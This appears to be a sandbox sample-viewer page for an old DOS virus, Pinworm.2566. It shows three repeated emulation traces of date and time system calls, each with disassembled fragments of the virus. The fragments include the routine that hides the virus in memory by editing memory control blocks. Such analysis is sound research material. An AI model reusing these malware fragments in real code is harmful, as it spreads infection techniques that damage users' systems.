Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2566

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:22.368581325Z 250 PC: 12bc4 | UNKNOWN!
2018-12-17T22:58:22.369770517Z 42 PC: 12bcc | Get date 0x12bcc: cmp dl, 0xd
0x12bcf: jne 0x12bd7
0x12bd1: mov byte ptr cs:[bp + 0x7dd], 1
0x12bd7: mov ax, es
0x12bd9: dec ax
0x12bda: mov ds, ax
0x12bdc: cmp byte ptr [0], 0x5a
0x12be1: jne 0x12c28
0x12be3: sub word ptr [3], 0x180
0x12be9: sub word ptr [0x12], 0x180
0x12bef: mov es, word ptr [0x12]
0x12bf3: push cs
0x12bf4: pop ds
0x12bf5: mov si, bp
0x12bf7: mov cx, 0x491
0x12bfa: xor di, di
0x12bfc: rep movsd dword ptr es:[di], dword ptr [si]
0x12bfe: xor ax, ax
0x12c00: mov ds, ax
0x12c02: push ds
2018-12-17T22:58:22.371848609Z 44 PC: 130b3 | Get time 0x130b3: mov word ptr [0x7e4], dx
0x130b7: pop ax
0x130b8: ret
0x130b9: push ax
0x130ba: mov ax, word ptr [0x7e4]
0x130bd: mov cx, 0x7ab5
0x130c0: mul cx
0x130c2: add ax, 0x3619
0x130c5: mov word ptr [0x7e4], ax
0x130c8: pop cx
0x130c9: mul cx
0x130cb: cmp dx, 0
0x130ce: jne 0x130d1
0x130d0: inc dx
0x130d1: ret
0x130d2: inc bx
0x130d3: dec ax
0x130d4: dec bx
0x130d5: dec sp
0x130d6: dec cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12863,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:40.910127459Z 250 PC: 12bc4 | UNKNOWN!
2018-12-25T12:36:40.911351046Z 42 PC: 12bcc | Get date 0x12bcc: cmp dl, 0xd
0x12bcf: jne 0x12bd7
0x12bd1: mov byte ptr cs:[bp + 0x7dd], 1
0x12bd7: mov ax, es
0x12bd9: dec ax
0x12bda: mov ds, ax
0x12bdc: cmp byte ptr [0], 0x5a
0x12be1: jne 0x12c28
0x12be3: sub word ptr [3], 0x180
0x12be9: sub word ptr [0x12], 0x180
0x12bef: mov es, word ptr [0x12]
0x12bf3: push cs
0x12bf4: pop ds
0x12bf5: mov si, bp
0x12bf7: mov cx, 0x491
0x12bfa: xor di, di
0x12bfc: rep movsd dword ptr es:[di], dword ptr [si]
0x12bfe: xor ax, ax
0x12c00: mov ds, ax
0x12c02: push ds
2018-12-25T12:36:40.913980536Z 44 PC: 130b3 | Get time 0x130b3: mov word ptr [0x7e4], dx
0x130b7: pop ax
0x130b8: ret
0x130b9: push ax
0x130ba: mov ax, word ptr [0x7e4]
0x130bd: mov cx, 0x7ab5
0x130c0: mul cx
0x130c2: add ax, 0x3619
0x130c5: mov word ptr [0x7e4], ax
0x130c8: pop cx
0x130c9: mul cx
0x130cb: cmp dx, 0
0x130ce: jne 0x130d1
0x130d0: inc dx
0x130d1: ret
0x130d2: inc bx
0x130d3: dec ax
0x130d4: dec bx
0x130d5: dec sp
0x130d6: dec cx

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12863,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:41.305816507Z 250 PC: 12bc4 | UNKNOWN!
2018-12-25T12:36:41.307552193Z 42 PC: 12bcc | Get date 0x12bcc: cmp dl, 0xd
0x12bcf: jne 0x12bd7
0x12bd1: mov byte ptr cs:[bp + 0x7dd], 1
0x12bd7: mov ax, es
0x12bd9: dec ax
0x12bda: mov ds, ax
0x12bdc: cmp byte ptr [0], 0x5a
0x12be1: jne 0x12c28
0x12be3: sub word ptr [3], 0x180
0x12be9: sub word ptr [0x12], 0x180
0x12bef: mov es, word ptr [0x12]
0x12bf3: push cs
0x12bf4: pop ds
0x12bf5: mov si, bp
0x12bf7: mov cx, 0x491
0x12bfa: xor di, di
0x12bfc: rep movsd dword ptr es:[di], dword ptr [si]
0x12bfe: xor ax, ax
0x12c00: mov ds, ax
0x12c02: push ds
2018-12-25T12:36:41.30997807Z 44 PC: 130b3 | Get time 0x130b3: mov word ptr [0x7e4], dx
0x130b7: pop ax
0x130b8: ret
0x130b9: push ax
0x130ba: mov ax, word ptr [0x7e4]
0x130bd: mov cx, 0x7ab5
0x130c0: mul cx
0x130c2: add ax, 0x3619
0x130c5: mov word ptr [0x7e4], ax
0x130c8: pop cx
0x130c9: mul cx
0x130cb: cmp dx, 0
0x130ce: jne 0x130d1
0x130d0: inc dx
0x130d1: ret
0x130d2: inc bx
0x130d3: dec ax
0x130d4: dec bx
0x130d5: dec sp
0x130d6: dec cx